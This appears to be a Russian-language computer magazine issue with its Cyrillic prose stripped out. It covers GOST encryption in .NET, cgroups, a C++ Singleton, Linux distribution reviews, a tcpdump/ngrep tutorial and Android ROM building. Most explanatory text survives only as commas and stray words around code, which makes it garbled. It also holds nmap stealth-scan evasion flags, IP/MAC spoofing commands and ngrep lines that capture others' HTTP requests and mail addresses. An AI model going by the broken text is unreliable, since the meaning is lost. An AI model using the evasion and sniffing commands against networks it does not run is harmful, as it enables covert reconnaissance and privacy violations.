        // encrypt the feedback register in ECB mode to obtain the gamma
        Gost28147.Gost28147Ecb(m_State, tmpState, m_Key);
        // XOR the plaintext with the gamma; the result becomes the new register state
        Gamm(plainBlock, tmpState, m_State);
        Array.Copy(m_State, 0, outputBuffer, outputOffset, 8);
        inputCount -= 8;
        inputOffset += 8;
        outputOffset += 8;
        result += 8;
    }
    ...
    return result;
}

,
. , ,
XOR. , ,
.
TransformFinalBlock
TransformBlock, .
,
,
.
GostCfbTransformDecr
GostCfbTransformEncr,
CFB, , ,
( ,
).

KEYEDHASHALGORITHM
KeyedHashAlgorithm .
HashAlgorithm, :
protected abstract void HashCore(
byte[] array, int ibStart, int cbSize)
protected abstract byte[] HashFinal()

CLR

,
28147-89. ( 16 ,
16 ). , ,
HashAlgorithm, , ,
KeyedHashAlgorithm:
.


28147-89 GostImito.
KeyValue
HashValueSize 32, 32 .
HashCore , (
InternalTransform).
DWORD, 16-
, :
...
uint tempInH = Gost28147.Bytes2Dword(array,
(int)(ibStart + i * 8));
uint tempInL = Gost28147.Bytes2Dword(array,
(int)(ibStart + i * 8 + 4));
uint tempOutH = 0;
uint tempOutL = 0;
Gost28147.EncryptBlock16(ref tempInH, ref tempInL,
ref tempOutH, ref tempOutL,
Gost28147.P, KeyValue);
uImito ^= tempOutH;
...

(8 ) DWORD, 16-
(EncryptBlock16),
.
DWORD , -,
(XOR DWORD
, XOR ), , .
HashFinal ,
.
.NET
Framework GAC.

GAC
GAC Browser


.NET,
GAC, Global Assembly Cache (-



). GAC ,
. , , strong name, ,
, .
,
sn.exe, .NET
Framework. :
sn.exe -k keypair.snk


keypair.snk. Signing
Sign the assembly (.
3). . , .
GAC
gacutil, .NET Framework.
.NET,
, GAC .
:
gacutil /i < >

Public Key Token, Culture , GAC Explorer,


Windows, GAC Browser (. 4).


.NET .
machine.config, XML .

cryptographySettings,
mscorlib. Name Mapping.
:
cryptoClass,
nameEntry. , ,
.
OID -

oidMap
oidEntry.
<cryptographySettings>
<cryptoNameMapping>
<cryptoClasses>
<cryptoClass GOSTCFB="Gost.GostCfb, GostAlgs,
Version=1.0.0.0,Culture=ru,PublicKeyToken=9b088f4818daa492"/>
<cryptoClass GOSTIMITO="Gost.GostImito, GostAlgs,
Version=1.0.0.0,Culture=ru,PublicKeyToken=9b088f4818daa492"/>
</cryptoClasses>
<nameEntry name="GostImitoAlg" class="GOSTIMITO" />
<nameEntry name="GostCfbAlg" class="GOSTCFB" />
<nameEntry
name="System.Security.Cryptography.KeyedHashAlgorithm"
class="GOSTIMITO" />
<nameEntry
name="System.Security.Cryptography.SymmetricAlgorithm"
class="GOSTCFB" />
</cryptoNameMapping>
<oidMap>
<oidEntry OID="1.2.643.2.2.21" name="GostCfbAlg" />
<oidEntry OID="1.2.643.2.2.22" name="GostImitoAlg" />
</oidMap>
</cryptographySettings>

GOSTCFB GOSTIMITO,
GostCfbAlg GostCfb, GostImitoAlg
GostImito.

<nameEntry
name="System.Security.Cryptography.KeyedHashAlgorithm"
class="GOSTIMITO" />
<nameEntry
name="System.Security.Cryptography.SymmetricAlgorithm"
class="GOSTCFB" />

, GostCfb, - GostImito
(. 5). SymmetricAlgorithm.
Create GostCfbAlg .

CryptoConfig


28147-89
28147-89
,
. ,
: XOR,
2^32 11 .
(8 ) 4
. ( mod 2^32),

(SBox), .
.
31- , 32 ,
8 .
, 28147-89,
.

.
7.

KeyedHashAlgorithm.Create, .
CryptoConfig.CreateFromName,
Activator.CreateInstance
catch.


null.
oidMap OID
, CryptoConfig
OID . , MSDN , name oidEntry
( , , GostCfb),
,
nameEntry, OID .
, - , ,
machine.config. OID private machineOidHT, -private
machineNameHT CryptoConfig (. 6).

, 28147-89

CLR
- ,
CryptoStream,
Stream.

.
, ,
CryptoStream ,
CryptoStream .
.
-
.
CryptoStream
,
. ,
,
, Position - CryptoStream.


MONO PROJECT
Mono, , GAC,
. , ,
:
$ gacutil -i < >

:
$ gacutil -l

machine.config ( Ubuntu) /etc/mono/<


Mono>/.

,
.NET Framework, .
- . z


(ivinside.blogspot.com)

.
,
?

, 50
, (
50 ; , ).
,
.
. ,


.
- , :
,
, .
(100 - ) / .
, y(x) = x + (100 - x) / x.
. ,
, . ;).
, , = 10,
19. ! . , ...
, .
,


, , , !
,
. , : n(k) + (n(k) - 1) + ... +
(n(k) - k + 1), k , n
. , ,
:
(2 * n(k) - k + 1) * k / 2. n(k) = 100 / k + k / 2 - 1/2,
. :) , ,
200, , 14,
.

:
tokens = []
for token in tokeniter:
    if token not in tokens:
        tokens.append(token)

tokensiter ,
, .

, tokensiter.
.

if token not in
tokens:, -
O(n*m), 1 < m < n. , , . ,
, .
:
import random
import timeit

# test data: 19999 random integers
# in the range 1 to 99999
f = []
for i in xrange(1, 20000):
    f.append(random.randrange(1, 100000))

# original approach: membership test against a list
def func1():
    tokens = []
    for token in f:
        if token not in tokens:
            tokens.append(token)

# dictionary approach: membership test against a dict
def func2():
    tokensdict = {}
    i = 0
    for token in f:
        if token not in tokensdict:
            # remember the position at which the token first appeared
            tokensdict[token] = i
            i += 1
    # list sized to hold every unique token
    tokens = [0 for i in xrange(len(tokensdict))]
    # place each token at its recorded position
    for key in tokensdict:
        tokens[tokensdict[key]] = key

t = timeit.Timer(setup='from __main__ import func1',
                 stmt='func1()')
print t.timeit(number = 1)
t = timeit.Timer(setup='from __main__ import func2',
                 stmt='func2()')
print t.timeit(number = 1)

$ python2 test.py
6.80089592934
0.0135538578033

600 .
O(n),
.
.
O(log n).
.

?
Linux.

cpulimit, SIGSTOP SIGCONT:


# cpulimit --pid=<pid> --limit=<value>

value , , pid.
CPU, ,
4-
, 100%, 400%.
cgroups,
.
.
cgroups:
$ yaourt -S libcgroup



,
:
group default {
perm {
task {
uid = root;
gid = root; }
admin {
uid = root;
gid = root; }}
cpu {
cpu.shares = 10; }}

1
, - .
: ) , )

, .
2
( ).
, Python.

group daemons/tomcat {
perm {
task {
uid = root;
gid = root; }
admin {
uid = root;
gid = root; }}
cpu {
cpu.shares = 40; }}

3
, URL (
URL), N
. N,
, 10.
.
threading, eventlet, gevent, Twisted .
4
Oracle
. , ,
.

group daemons/postgres {
perm {
task {
uid = root;
gid = root; }
admin {
uid = root;
gid = root; }}
cpu {
cpu.shares = 50; }}
mount {
cpu = /mnt/cgroups/cpu;
cpuacct = /mnt/cgroups/cpu;
}

,
: daemons/tomcat 40 %, daemons/
postgres 50 %, default 10 %. . /etc/cgrules.conf:
<user>        <controllers>   <destination>
*:tomcat      cpu             daemons/tomcat/
*:postgres    cpu             daemons/postgres/
*             cpu             default/

filtered , .
:
;
;

;
(
, ).
:
IP- MAC- ( ,
/, ):

tomcat daemons/
tomcat, postgres daemons/postgres, default.

# ifconfig eth0 192.168.1.123


# ifconfig eth0 hw ether 00:01:02:03:04:05

, , + ,
;
, .

# nmap -sS -Pn -n -iL active-hosts

. ,
/ filtered.
?



nmap, :
--max-rate 50
50 /;
-f ;
-g 88 ;
--data-length 50 50
.

/. z


>> coding

deeonis (deeonis@gmail.com)

-
,
-

.

, ,
,

.
,
, Singleton.
,
, .

, Singleton. , , - .
, -
Windows, user mode - , . ,
, ini-
. , ,
,
. Save,
. , ,
?
,
.
.
.


, ,
, gSettings,
. CSettings. , ,
, .
.

class CSettings
{
public:
    void getSettings() {...};
    //...
};
// global object
CSettings gSettings;

-,
.
CSettings gSettings. , , ,
,
, , gSeetings
. -,

, .

gSettings, ,
,
.
, ,
. -, CSettings, ,
, , gSettings
. ,
, , .
- :
static
.

class CSettings
{
public:
    static void getSettings() {...};
    //...
};
//

CSingleton;


class CSettings
{
private:
    CSettings();
    static CSettings* m_instance;
public:
    static CSettings* getInstance()
    {
        if (m_instance == 0)
            m_instance = new CSettings();
        return m_instance;
    }
    void getSettings() {...};
    //...
};
// definition of the static member
CSettings* CSettings::m_instance = 0;
// calling a CSettings method
CSettings::getInstance()->getSettings();

CSettings::getSettings();


, , .
,
, , . ,
:
.
- . , ,
ini-. ,
, , -
CSettings , CSettings
.

, , CSettings
. , new.
-
getInstance().
CSettings
m_instance, ,
,
. , 100 %- ,
,
, ,
.

, ,
,
. ,

. ,
, .
, C++ .
, . , private,
.
, .
.

( ) .
.
, . .
CSingleton,
,
getInstance(), . ,

,
( ,
), , -



, getInstance
. .
CSingleton
template <class T>
class CSingleton
{
public:
    virtual ~CSingleton() {};
    static T* getInstance()
    {
        if (m_instance == 0)
            m_instance = new T();
        return m_instance;
    }
protected:
    CSingleton() {};
    static T* m_instance;
};
// definition of the static member of the template
template <class T>
T* CSingleton<T>::m_instance = 0;
// CSettings derived from CSingleton
class CSettings : public CSingleton<CSettings>
{
private:
    CSettings();
protected:
    friend class CSingleton<CSettings>;
public:
    static void getSettings() {...};
    //...
};

CSingleton ,
getInstance . , , ,
CSettings - ,
new.
, C++ friend,
. -
.
,
. ,
, CSingleton
, .
CSingleton, .

Wikipedia

,

CSettings. , 1
getInstance. , m_instance
, , CSettings , .
2, getInstance,
, , m_instance.
1, ,
CSettings , m_instance.
.
, , ,
.
, . C++
, API- . Windows CSingleton,
, :
CSingleton
template <class T>
class CSingleton
{
public:
    virtual ~CSingleton() {};
    static T* getInstance()
    {
        EnterCriticalSection(...);
        if (m_instance == 0)
            m_instance = new T();
        LeaveCriticalSection(...);
        return m_instance;
    }
protected:
    CSingleton() {};
    static T* m_instance;
};

,
CSettings, .
, .



. , , ,
, .
, -. z


UNIXOID

grinder (grinder@tux.in.ua)


LINUX


,


:
,
,
,


.



.



.


INFO
Sabayon

.
Sabayon emerge
,

equo,
.
.config Calculate
Linux
1560 ,
866,
Sabayon
2625 1250
.

Calculate
Linux
.
Linux Mint

.
PCLinuxOS

x64.
, Mageia

Mandriva.

GENTOO
Gentoo,
, ,
:
.
,

( USE), ,
.

Sabayon 7

: sabayon.org
: GPL
: i686, x86_64
: Intel Pentium II, 512 M RAM, 6
Kernel 3.0, Glibc 2.13, Udev 171, X.org 1.10.4, GNOME 3.2, KDE 4.7,
LibreOffice.Org 3.4.3
Sabayon Gentoo,
Distrowatch.com .
Fabio Erculiani. ,
, Gentoo ,
, .
(
) Gentoo.
, 5.4
ServerBase .


Sabayon Entropy Store

,
SpinBase:
: KDE, GNOME;
: XFce, LXDE, Enlightenment SpinBase/
OpenVZ ( OpenVZ).
,
CoreCDX, SpinBase
(Fluxbox). 4.1
Molecule.
DAILY . ,
( isohybrid).
Gentoo, Portage,
. , Sabayon
Entropy. , , ,
Gentoo ,
. equo:

, Sabayon ,
, .
,
. 6 /etc/make.conf . ,
, ,
. make.conf
.
Live-
. (
XBMC). Anaconda,

. ,
. , , ,
. , , (
man).
Sabayon , ,
. ,
wide-, 4:3 ,
GNOME , root
.
. , .
( ATI NVidia)
. :
,
. . , . .config Sabayon
, Calculate Linux ( Calculate 1560 ,
866, Sabayon 2625 1250 ).
, . /etc/skel
( 14 ),
.
,
,
Gentoo CL.

# equo install mc

equo , , ,
apt-get: , , ,
smart- ( ),
.
Magneto Store equo ( Magneto). Store
( ) ,
.
(USE-, , . .) ,

Portage. : emerge ,
equo ( Package Setting),
- . ,
, equo . , , , . Sabayon
.
Calculate Linux ( ),


DISTROWATCH.COM
( 06.11.2011)
1. Mint          2155
2. Ubuntu        2108
3. Fedora        1686
4. Debian        1318
5. openSUSE      1290
6. Arch          1222
7. PCLinuxOS     1032
8. CentOS         916
9. Puppy          866
10. Mandriva      708
11. Mageia        627
12. Lubuntu       612
13. Scientific    575
14. Zorin         563
15. Slackware     563
16. Chakra        563
17. Sabayon       557
18. FreeBSD       490
19. Bodhi         478
20. Gentoo        453


Calculate Linux 11.9

: calculate-linux.ru
: GPL
: i686, x86_64
: Intel Pentium II, 128 (XFce) 512 (KDE) M
RAM, 46
Kernel 3.0.4, Glibc 2.23.4, Udev 164, X.org 1.10.4, GNOME 2.32.1, KDE
4.7.1, LibreOffice.Org 3.3.4
, .
: (CDS Directory
Server) KDE- (CLD) , (LDAP, mail, ftp,
jabber, , . .). ,
. ,
, : GNOME (CLDG), XFce (CLDX), CMC (Calculate
Media Center, XBMC), CLS (Calculate Linux
Scratch) CSS (Calculate Scratch Server). , ,
. ,
Gentoo, IRC-
Gentoo Foundation. (Anthony G. Basile)
hardened/selinux-.
100 % Gentoo ( Gentoo)

, CL .

Calculate 2 ( ). , cl-install,
, , ,
.
,
.
,
,
Gparted c/fdisk. LVM
soft RAID /boot-.
IRC , . , .
RAM, , . ,
initramfs udev, ,
, Sabayon.
11.0 , ,
Sabayon,
, ,
( ). CL
equo,
emerge, , , vs .
,
( ).

REDHAT/FEDORA SLACKWARE
, Linux , RedHat/Fedora Slackware,
. ,
.
CentOS, , ,
, RedHat
.
Fedora
, ,
.
Fusion Linux (fusionlinux.org). Fuduntu
(fuduntu.org) Ubuntu, Fedora.
KDE Xange Linux (openxange.com) , .
RedHat (, CentOS)
Yellow Dog Linux (yellowdoglinux.com). ,
PowerPC PS3.
. VectorLinux (www.
vectorlinux.com), ;
Zenwalk (zenwalk.org), ; DeepStyle (deepstyle.org.ua) AgiliaLinux (
MOPSLinux, agilialinux.ru).

(/var/lib/layman/calculate/profiles/patches), , ,
.
: Grub .
- ,
. /var/calculate/linux cl-install.
Chromium OS , , .

# eselect profile list

( *) .
# eselect profile set 1

Gentoo. CL - , , USE- .
ebuild-


Calculate Linux


, 50 % ).
2.32. , KDE, XFce, Fluxbox . : DVD- (
, ), OEM- CD- ( ).
Windows .
( ), .

Zorin OS 5.1

: zorin-os.com
: GPL
: i386, x86_64
: Intel Pentium II, 512 M RAM, 6
Kernel 2.6.38, Glibc 2.13, Udev 167, X.org 1.10.1, GNOME 2.32.2,
LibreOffice.Org 3.3.3.1
Linux Mint

UBUNTU
, Ubuntu, , . ,
.

Linux Mint 11 "Katya"

: linuxmint.com
: GPL
: i386, x86_64
: Intel Pentium II, 512 M RAM, 4
Kernel 2.6.38-8, Glibc 2.13, Udev 167, X.org 1.10.1, GNOME 2.32.1,
LibreOffice.Org 3.3.2
Ubuntu, , , Linux. (
) Distrowatch.com,
. Clement Lefebvre.
,
.
( ).
Windows-.
,
Ubuntu, 100 %.

, ,
Ubuntu, .
. , . , ,
mintMenu, mintInstall
mintUpdate. mintInstall
: . , , ,
. Ubuntu Software Center,
, .
, -
(community.linuxmint.com/software). mintUpdate
: ,
, . Ubuntu, LTS-
.
LMDE, Debian
Gnome XFce Rolling
release. LMDE (201109).
GNOME (


, Ubuntu
, Windows.
( GnoMenu, , ,
) Win7. , .
Nautilus-Elementary
Gloobus Preview, Apple Quicklook.

, Software Center .
Zorin OS Look Changer
,
, Win7, WinXP Ubuntu.
Internet Browser Manager
- ( Chrome).
ZOS Wine
PlayOnLinux Winetricks, Windows. Ubuntu. , Core (
), Lite ( LXDE) Educational
. (Ultimate, Business,
Multimedia, Gaming) .
Ubuntu, LTS- (3.1).

Zorin OS Win7

Localization Manager (addlocale):
, , .
, . ,
PCLinuxOS Magazine,
(Karoshi, CAElinux, TinyMe ZEN-mini).

Mageia 1

: mageia.org/ru/
: GPL
: i586, x86_64
: Intel Pentium II, 512 M RAM, 6
Kernel 3.0.4, Glibc 2.12.1, Udev 173, X.org 1.10.4, GNOME 2.32.1, KDE
4.7.4, LibreOffice.Org 3.4.3

PCLinuxOS addlocale

MANDRIVA
, Mandriva
.

PCLinuxOS KDE 2011 Desktop


: pclinuxos.com
: GPL
: i586
: Intel Pentium II, 512 M RAM, 3
Kernel 2.6.38.8, Glibc 2.11.2, Udev 168, X.org 1.10.4, GNOME 2.32.1,
KDE 4.6.4

2003 Mandrake
( Mandriva). Radically Simple .

, Live-.
. 2007 PCLinuxOS Mandriva.
KDE-, (XFce, LXDE, OpenBox GNOME) . Full Monty Desktop DVD
, . Rolling
release, RPM-based.
PCLOS , 64- CPU.
CD-,
.
, LibreOffice
. URPM PCLinuxOS
,
APT Synaptic. ,
DrakX, : , .
, -

ZOS
WINE
PLAYONLINUX WINETRICKS

, , 2010.
Mandriva, . ,
Mandriva, ,

.
.
.
, , , , . ,
Mageia :
161 , 20 .
. -, 32- CD KDE GNOME. (Europa 2). DVD-
ISO, , 32-,
64- . .
Mageia Mandriva. Mageia Live ,
. ,
: .
, ,
. Mageia Control
Center, Mandriva CC. Rpmdrake.
Mandriva Mageia 1. ,
, mageia.org/en/1/migrate. z

Mageia Mandriva,


(execbit.ru)


TCPDUMP

UNIX-


.
,

tcpdump. ,
Linux
BSD- , ,
.

tcpdump , ,
.
,
.

tcpdump , .
25 ,
UNIX.
UNIX-
Windows libpcap, tcpdump.
, tcpdump,
,
.

tcpdump ,
TCP, UDP, ICMP, SMB/CIFS, NFS, AFS, AppleTalk. tcpdump

?
. :
Flags [.], seq 3666073194:3666074622, ack 3281095139,
win 2000, options [nop, nop, TS val 70228462 ecr 1681724],
length 1428

TCP-, tcpdump
( ):
DNS- tcpdump

DNS-


, tcpdump
. root ( , tcpdump
),
:
# tcpdump -i wlan0 -c 10 -n

'-n' IP- DNS-.


, :
# tcpdump -i wlan0 -c 10 -n host 192.168.0.1 \
and port 53

, tcpdump, ,
DNS- tcpdump.
, DNS- ( 53) 192.168.0.101
192.168.0.1 . ?
16:22:41.340105 ( frac).
IP, , , :
: . , ,

. tcpdump
,
.
tcpdump DNS- 49244+ A? ya.ru. (23), ,
A?, ya.ru,
TCP/IP- 23
. .
,
, (8/2/3) (A
213.180.204.3, A 77.88.21.3, A 87.250.250.3...).


flags .
S (SYN), F (FIN), P (PUSH) R (RST),
.
data-seqno ,
first:last, first last

nbytes.
ack (ISN + 1).
window .
options ,
<mss 1024> ( ).
length .


,
.
, -X:
# tcpdump -i wlan0 -c 10 -n -X \
host 192.168.0.1 and port 80


, HTTP, .
, , .
,
'-v'. IP
IP-:
(tos 0x0, ttl 64, id 8339, offset 0, flags [DF],
proto UDP (17), length 51)

-, .
(TOS), (TTL),
,
, , (TCP,
UDP, ICMP) .


tcpdump, .
, host port,
, ,
, ?
src:
# tcpdump -i wlan0 -c 10 -n src 192.168.0.1

dst,
. , and:
# tcpdump -i wlan0 port not 22 and port not 53


GREP

TCPDUMP

tcpdump
,
.
ngrep,
, .
, , GET
POST HTTP-,
:

tcpdump:

# ngrep -l -q -d eth0 "^GET |^POST " \
tcp and port 80
:
# ngrep -i 'game*|p0rn|adult' -W byline \
-d eth0 > slackers.txt
SMTP- :
# ngrep -i 'rcpt to|mail from' tcp port smtp

, SSH DNS-. or () except ().


, tcpdump :

i [] , any.
n IP- DNS-.
nn IP- .
X .
XX Ethernet-.
v, -vv, -vvv
(, , ).
c [n] n .
s [n] , ( ,
).
S TCP-
(TCP sequence numbers).
e Ethernet-.
q ( ).
E IPsec- .

SYN ( TCP-), :
# tcpdump 'tcp[13]==2'

# tcpdump -i wlan0 -c 10 -n portrange 21-23

:
# tcpdump -i wlan0 -c 10 -n 'len > 32 and len <= 128'

? . TCP-
,
. SYN .
, . ,
:

:
# tcpdump 'tcp[tcpflags] & tcp-syn != 0'
# tcpdump -i wlan0 -c 10 -n src net 192.168.0.0/16 \
and dst net 10.0.0.0/8 or 172.16.0.0/16

tcpdump

.
: proto[expr:size], proto , expr
, size ,
( 1
). , -

tcpdump :
,
TCP/IP.
tcpdump,
.
1 , tcpdump
TCP- , nmap. , nmap 192.168.0.100

1. TCP-


2. SYN-

TCP- ,
SYN- (S ). 8888,
RST-. ,
.
587 . , nmap SYN-
22- (SSH) SYN-ACK:

, TCP-
, , ,
, . tcpdump
2.
TCP-, -
:

192.168.0.100.43337 > 192.168.0.111.22: Flags [S], seq 2610024277, ...
192.168.0.111.22 > 192.168.0.100.43337: Flags [S.], seq 3496707239, ack 2610024278, ...
192.168.0.100.43337 > 192.168.0.111.22: Flags [.], ack 1, ...

192.168.0.100.48585 > 192.168.0.111.22: Flags [S], seq 1679394613, ...
192.168.0.111.22 > 192.168.0.100.48585: Flags [S.], seq 625029896, ack 1679394614, ...
192.168.0.100.48585 > 192.168.0.111.22: Flags [R], seq 1679394614, ...

, nmap ,
RST-, .
: , ACK-,
. , , , .
:
, . , ,
, nmap, , .
:
SYN- (nmap -sS). -

, ,
SYN-ACK, ,
, . 3 UDP-. : nmap UDP-,
. ,
ICMP unreachable:

RTMP-
-, tv.adobe.com,
RTMP .
, tcpdump .
RTMP-, :
# tcpdump -eflAi eth0 -s 0 -w - | strings | \
grep -ao "rtmp://.\+.flv"
rtmpdump (lkcl.net/rtmp) flv- :
$ ./rtmpdump -r 'URL' -o .flv

16:41:48.798310 IP 192.168.0.100.61020 > 192.168.0.111.18869: UDP, length 0
16:41:48.798346 IP 192.168.0.111 > 192.168.0.100: ICMP 192.168.0.100 udp port 18869 unreachable, length 36

.
null-, ,
(nmap -sN).
, . , Linux RST-:
192.168.0.100.39132 > 192.168.0.111.256: Flags [],
win 3072, length 0
192.168.0.111.256 > 192.168.0.100.39132: Flags [R.], ...

Xmas- FIN, URG PUSH (- ,


):
192.168.0.100.35331 > 192.168.0.111.5544: Flags [FPU],
seq 3998959601, win 4096, urg 0, length 0
192.168.0.111.5544 > 192.168.0.100.35331: Flags [R.],
seq 0, ack 3998959602

, . ACK-


3. UDP-

(-sA) tcpdump
ACK
RST. , ,
, nmap ,
. tcpdump
, , ICMP-
:
16:43:06.008305 IP 192.168.0.100 > 192.168.0.111: ICMP type-#68, length 1032
16:43:06.008383 IP 192.168.0.100 > 192.168.0.111: ICMP type-#34, length 1032
16:43:06.008714 IP 192.168.0.100 > 192.168.0.111: ICMP type-#183, length 1032
16:43:06.008831 IP 192.168.0.100 > 192.168.0.111: ICMP type-#192, length 1032

, ,
.
ICMP- . (, SYN)
.


tcpdump ,
,
.
, tcpdump
,
Wireshark:
$ ssh root@example.ru tcpdump -w - 'port !22' \
| wireshark -k -i -

google.com tcpdump


, ,
,

. ,
, Cisco Discovery Protocol,
Cisco :
# tcpdump -nn -v -i eth0 -s 1500 -c 1 \
'ether[20:2] == 0x2000'

,
DHCP (DISCOVER, REQUEST, INFORM),
:

'-w -' Wireshark, .


Snort:

# tcpdump -i eth0 -vvv -s 1500 '((port 67 or port 68) and (udp[8:1] = 0x1))'

$ ssh root@example.ru "tcpdump -nn -i eth1 -w -" \
| snort -c /etc/snort/snort.conf -r -

# tcpdump -i eth0 "tcp port pop3 and ip[40] = 85 \
and ip[41] = 83" -s 1500 -n

grep,
, :
# tcpdump -nnvv -r dump.cap tcp | \
grep -v "tcp sum ok" | wc -l


, POP3-:

tcpdump , , .
,
. z


UNIXOID

(execbit.ru)

ID
O
R
D
N
A

Android

,
,



.
,

.

Linux,

Android ,
.


WWW
goo.gl/tlHRo


framework-res.apk.
goo.gl/fTvz8


Android.
goo.gl/Ya1fX

.
goo.gl/P6JR

IBM PC.
goo.gl/sGXwa

Android Honeycomb.


Android-:
1. , Google CyanogenMod.
2. .
3. ,
.
,
Android ,
.
, Android
, ,
.
( ) Android-,
.
,
,
. ,
, ,
.
.


xda-developers


, ,

ClockworkMod, ( , ,
,
][).
, , ,
. ,
, .
?
, ,
xda-developers.com.
, iOS, Windows
Mobile, Windows Phone Android. ,
Forums . Android
Development , [ROM]. -
Pure Android 2.3 Rom
CyanogenMod, , ,
(, , ). , , -
ROM .
.
unzip:
$ mkdir ~/rom; cd ~/rom
$ unzip ..///.zip

: META-INF, boot.img system.


,
,
, ,
NAND- ,
-, .
boot.img , Linux initrd. ,
,
/proc. ,
,
BFS NFS,
xda-developers
ClockworkMod.
, system , .

Android Linux. ,
, . :
app : , ,
. .
bin /bin /usr/bin Linux. , . ,
dalvikvm.
etc . /etc Linux, , , .
Android /data/data.
fonts .
Droid ( Roboto Android 4.0).
framework Java-,
Android-. framework-res.apk, ,
.
lib Linux-,
. /lib /usr/lib Linux,
, libc (,
Android Bionic Glibc), libz (gzip), libssl .
media : , ,
.
tts , .
usr , , bin. ,
/usr/share.
vendor , .
firmware , Wi-Fi.
xbin , ,
bin. ,
, (top,
). CyanogenMod : bash, ssh, powertop,
busybox . .
build.prop , ,
.

, , , , Android, ,
NAND- .
Android ,
,

/system/app
. ,
, . ,
, Android ( ADWLauncher
CyanogenMod) . K,
LauncherPro (www.launcherpro.com):

$ rm system/app/Launcher.apk
$ wget goo.gl/U9c54 -O system/app/LauncherPro.apk

. , ,
. , Android
.
.
(, prey),
. ,
Dialer One Phone.apk Go SMS
sms.apk.
Linux-, ssh mc? .
Android ARM NDK
Google,
. , mc .
xda-developers Midnight
Commander. apk- (goo.gl/Pax1H)
unzip:
$ cd /tmp; unzip ~/NativnuxInstaller_1.1.apk

assets/kits/mc-4.7.5.4arm.tar.jet. tar.gz,
apk- ( ,
apk, Install).
mc:
$ cd ~/rom
$ tar -xzf /tmp/assets/kits/mc-4.7.5.4-arm.tar.jet

mc.
zip-
ClockworkMod Recovery. ,
(
~/rom) unzip.

SETPROP
build.prop
setprop:
# setprop debug.sf.nobootanimation 1

layout XML (
AXML, apktool XML).
,
, , .
xda-developers,
Android.
framework-res mod
_.

framework-res.apk, . , framework-res
diff:
$ diff -r ~/framework-res \
~/rom/system/framework/framework-res

,
framework-res,

4PDA: goo.gl/tlHRo.
framework-res.apk
apktool.
aapt Android SDK, apktool
apk-. :
$ cd ~/bin; wget goo.gl/tC7k8


,
Android .
Android, , .
Android framework/
framework-res.apk.
apktool:
$ cd ~; wget goo.gl/hxz5l
$ tar -xjf apktool1.4.1.tar.bz2
$ cd ~/rom/system/framework
$ java -jar ~/apktool.jar d framework-res.apk


framework-res, . res/drawable-* res/layout-*.
png-
. , drawableland-mdpi
,
(
). ,
.


$ cd ~/rom/system/framework
$ java -jar ~/apktool.jar b framework-res
$ cp framework-res/dist/framework-res.apk .
$ rm -rf framework-res

. png-, system/
media/bootanimation.zip. :
$ cd /tmp
$ mkdir bootanimation; cd bootanimation


,

ANDROID

build.prop Motorola Defy

FPS 24):
$ mplayer -nosound -vo png:z=9 video.avi

. xda-developers
,
.
.


, , . Android
system/build.prop,
.
,
Android, .
.
ClockworkMod Recovery: Android

$ unzip ~/rom/system/media/bootanimation.zip

desc.txt, :
FPS
p
...

1. :
ro.HOME_APP_ADJ=1


.

.
2. JPG-:

:
ro.media.enc.jpeg.quality=100
480 800 30
p 1 0 part0
p 0 0 part1

, 480 x 800, (FPS) 30 /.


,
part0. ( 1
p). (part1)
, . part0 , ,
part0 ,
. ,
,
0001.png, 0002.png . .
,
.
png- mencoder ( desc.txt


, .
3. :
debug.sf.nobootanimation=1

4. GPU:
debug.sf.hw=1

.
5. ( USB):
persist.adb.notify=0


wifi.supplicant_scan_interval=180
pm.sleep_mode=1
ro.ril.disable.power.collapse=0

3. 3G-:
ro.ril.hsxpa=2
ro.ril.gprsclass=10
ro.ril.hep=1
ro.ril.enable.dtm=1
ro.ril.hsdpa.category=10
ro.ril.enable.a53=1
ro.ril.enable.3g.prefix=1
ro.ril.htcmaskw1.bitmask=4294967295
ro.ril.htcmaskw1=14449
ro.ril.hsupa.category=5

4. :
framework-res.apk

net.tcp.buffersize.default=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.wifi=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.umts=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.gprs=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.edge=4096,87380,256960,4096,16384,256960

system/
build.prop .

, , , . testsign.
zip:
$ cd ~/rom; zip -r my-rom.zip *

, Recovery
:
$ wget goo.gl/OyBBk
$ java -classpath testsign.jar testsign \
my-rom.zip my-rom-signed.zip

6.
:
ro.lge.proximity.delay=25
mot.proximity.delay=25

7. :
ro.mot.buttonlight.timeout=0

,
:
1. :
debug.performance.tuning=1
video.accelerate.hw=1
windowsmgr.max_events_per_sec=150

2. :


my-rom-signed.zip
.
Recovery,
( ).

Wipe data/factory reset,
( Recovery <Enter>), Yes
<Enter>.
Install zip from sdcard,
Choose zip from sdcard, my-rom-signed.zip SD-
Yes. Reboot
system now.

Android ,
.
, , ,
,
(/etc/init.d), .
. z


- Ubuntu 11.10

-
UBUNTU 11.10
Oneiric Ocelot ( ) 15- Linux- Canonical.
Unity. CD-,
DVD- ( 1,5 ),
(Inkscape, GIMP, Pitivi LibreOffice). ISO-
CD/DVD, USB Flash.


:
Linux kernel 3.0.1;

Unity 4.12.0
Compiz 0.9.6;
GNOME 3.2;

Mozilla Firefox 7.0.1, Mozilla
Thunderbird 7.0.1, LightDM,
Deja Dup, - Gwibber;
LibreOffice 3.4.2;
Python 3.2, GCC 4.6.1, Bash 4.2, CUPS 1.5.0,
Pidgin 2.10.0, UDEV 173, X.Org 1.10.4;
ARM- .

:
Ubuntu (Dash Home)
Launcher. Places,
,
Lenses,
(
, ,
, Google Docs) ,
.
.

<Alt+Tab>.


. ,


.
( ).
,
Launcher.
Unity
, . ,
,
, ,
.

Ubuntu Software Center 5.0



.
, , ,
, .
,

.

(
Ubuntu, . .) Software
Center OneConf,
,
(File > Sync between computers).


Qt Unity 2D, OpenGL. Unity 2D
Qt
Qt Quick. Unity 2D

, Unity 3D,

ARM.
Ubuntu LoCo
(goo.gl/cC5kr, ubuntu-defaults-builder),

: ,
, ,
, ,
- Banshee
Rhythmbox .


cloud-
.


, .
.
Canonical 2013 .
Ubuntu 12.04,
2012 , LTS-,

.


SYN/ACK

aka 13oz

WWW





gscentr.ru
GSPD




.
,


,

-

.



.
,
( ),
. ,
, .
.


,
. -,

(-).
, . ,
: 687 781.
. ,
.

1)
, ,
, ,
( ) .
, :
, , .
2) ( ) ,
, ,
( ) , . ,
.
3) () , .
, ,
. . ,

,
58 .
, ,
, .
4) ,
- ,
. ,
, . , .
5) .
: / , , ,
( ) ,
. ?
,
.
6)
, ,
. :)
, :
, (/), ( , ,
),
,
(/) ( ).
.
7) , ,
. ,
, ,
. .
8) .
: ,
, , (
